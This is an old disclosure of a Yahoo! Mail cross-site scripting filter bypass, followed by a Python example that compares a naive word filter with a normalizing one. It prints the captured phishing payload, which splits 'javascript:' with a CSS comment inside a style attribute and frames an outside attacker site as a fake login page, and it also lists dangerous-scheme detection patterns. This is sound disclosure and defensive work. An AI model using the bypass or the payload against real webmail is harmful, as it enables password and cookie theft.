
Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages, but it has filters to
prevent malicious scripts from being executed in users'
browsers. On 17 April 2006 I received a message that,
when viewed, redirected to a fake Yahoo! Mail login
web page; I noticed this because a strange
domain was displayed in the IE status bar.
When I looked at the HTML code, I found that the
message was:

 ...Message text ...

"style="background:url\(java/**/script:document.write('href="www.blabla23.com>"style="background:url\(java/**/script:document.write(' cols=100% rows=100% border=0 frameboarder=0framespacing=0>src=http://w00tynetwork.com/x/>'))">

You can see that the attacker used some tricks to bypass the filters, but we can't know all the tricks the attacker used because some characters were removed or replaced by the filter. That script loaded a fake Yahoo! Mail login web page in order to steal passwords. Yahoo! was contacted and they responded that the issue was going to be fixed; after that I haven't heard any news from them. It seems that the issue was fixed, because now the same message is displayed as:

 ...Message text ...

"style="background:url\(_java/**/script:document.write('href="www.blabla23.com>"style="background:url\(_java/**/script:document.write(' cols=100% rows=100% border=0 frameboarder=0framespacing=0>src=http://w00tynetwork.com/x/>'))">

The filters have now been improved: whenever the word javascript appears, a "_" is prepended to it, and an "x" is prepended to dangerous HTML tags. Again Yahoo! did not release any advisory nor contact customers about this issue. This issue was exploited for a long time by malicious people to steal passwords and cookies in order to compromise Yahoo! Mail user accounts, so it's very important that Yahoo! Mail users change their passwords in case their accounts were compromised.

Cesar.
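The bypass the advisory describes (a CSS comment splitting `javascript:` inside `background:url(` of a `style` attribute) defeats a filter that only looks for the literal word. The following Python example is added here and is not part of the original advisory; it runs a naive substring check and a normalizing check side by side on constructed inputs modelled on the payload above (sample strings, hostnames and function names are assumptions), and rejects the attribute rather than trying to repair it.

```python
import re

# Constructed sample style attribute values modelled on the advisory's payload.
SAMPLES = {
    "plain":   'style="background:url(javascript:alert(1))"',
    "comment": 'style="background:url(java/**/script:document.write(\'x\'))"',
    "mixed":   'style="background:url(JaVa/* */ScRiPt:foo)"',
    "benign":  'style="background:url(https://example.invalid/bg.png)"',
}

# CSS comments are ignored by the CSS parser, so they can be inserted between
# the letters of a scheme name; a substring filter never sees "javascript".
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Schemes inside url() that can execute code or smuggle content.
DANGEROUS_SCHEME = re.compile(
    r"url\(\s*['\"]?\s*(javascript|vbscript|data)\s*:", re.IGNORECASE
)


def naive_filter_flags(value):
    """The check a word-based filter effectively performs: does 'javascript' appear?"""
    return "javascript" in value.lower()


def normalize_css(value):
    """Strip CSS comments, whitespace and control characters before matching."""
    value = CSS_COMMENT.sub("", value)
    return re.sub(r"[\s\x00-\x1f]", "", value)


def normalized_filter_flags(value):
    """Match dangerous url() schemes on the normalized form the browser will act on."""
    return DANGEROUS_SCHEME.search(normalize_css(value)) is not None


def sanitize_style(value):
    """Reject the whole style attribute when it is flagged; keep benign values untouched."""
    return "" if normalized_filter_flags(value) else value


def compare_filters():
    """Return, per sample, which of the two checks flagged it."""
    return {name: (naive_filter_flags(v), normalized_filter_flags(v))
            for name, v in SAMPLES.items()}
```

The "comment" and "mixed" samples pass the naive check and are caught only after normalization, which is the gap the advisory's payload exploited.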
